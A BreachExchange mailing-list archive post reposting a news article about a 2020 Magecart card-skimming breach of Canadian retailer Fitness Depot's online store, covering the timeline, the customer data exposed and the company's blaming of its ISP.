BreachExchange mailing list archives
Fitness Depot hit by data breach after ISP fails to 'activate the antivirus'
From: Destry Winant <destry () riskbasedsecurity com>
Date: Tue, 9 Jun 2020 08:49:53 -0500
https://www.bleepingcomputer.com/news/security/fitness-depot-hit-by-data-breach-after-isp-fails-to-activate-the-antivirus/ Canadian retailer Fitness Depot announced customers that their personal and financial information was stolen following a breach that affected the company's e-commerce platform last month. Fitness Depot is the largest specialty exercise equipment retailer in Canada, with 40 stores nationwide and two in the United States, Texas, in Dallas and Houston. Signs of a Magecart attack Based on the info in the breach notification letter the company sent to all potentially impacted individuals, the attack has all the signs of a textbook Magecart attack where the threat actors were able to compromise Fitness Depot's online store and inject a malicious form designed to harvest and exfiltrate customer information. In such attacks, cybercrime groups known as Magecart groups hack e-commerce stores and inject malicious JavaScript-based scripts into their checkout pages as part of web skimming (aka e-skimming) attacks. The attackers' end goal is to steal all the payment or personal information submitted by the compromised sites' customers and to collect it on remote servers under their control. Digital skimming detection security firm Sansec spotted the payment card skimmers injected in Fitness Depot's e-commerce platform between April 2 and May 17, as shown by a public crawler detection report shared with BleepingComputer by the company's CEO and founder Willem de Groot. Not all customers were affected In a letter sent to affected customers, the company says that the attackers may have accessed or stolen the information of clients "who made purchases for delivery and or who made purchases for in-store pick up at one of our retail locations," reads. The information accessed or harvested by the attackers may have included the impacted customers' name, address, email address, telephone number, and credit card number. The breach goes as far back as February 18, 2020, according to Fitness Depot's data breach notification and it started with a malicious form being injected within the online store. "Once our customers where (sic) redirected to this form the customer information was copied without the authorization or knowledge of Fitness Depot," the company says. "This is how the personal information was captured and stolen." Only customers with home delivery were impacted between February 18 and April 27, while from April 28 and May 22 "any customer that ordered product for Home delivery or ordered product for in-store pick-up could have been potentially affected." The ISP gets blamed for the breach Fitness Depot blames its internet service provider (ISP) for the data breach saying that "[b]ased on our preliminary findings it appears our Internet Service Provider [ISP] neglected to activate the anti-virus software on our account." It is not yet known what Canadian fitness retailer refers to since it's not an ISP's job to protect its customers' e-commerce platforms with anti-malware solutions. BleepingComputer has reached out to Fitness Depot for more details but had not heard back at the time of this publication. Additionally, while Fitness Depot said that "personal information was captured and stolen," the company also says that it "has no knowledge that any of our customer information was compromised in any manner." Fitness Depot also advises customers to keep an eye out for identity theft or fraud attempts by monitoring their free credit reports and reviewing account statements. Update June 8: Added information on credit card skimmer scripts found on Fitness Depot's online store. _______________________________________________ BreachExchange mailing list sponsored by Risk Based Security BreachExchange () lists riskbasedsecurity com If you wish to Edit your membership or Unsubscribe you can do so at the following link: https://lists.riskbasedsecurity.com/listinfo/breachexchange
Current thread:
- Fitness Depot hit by data breach after ISP fails to 'activate the antivirus' Destry Winant (Jun 09)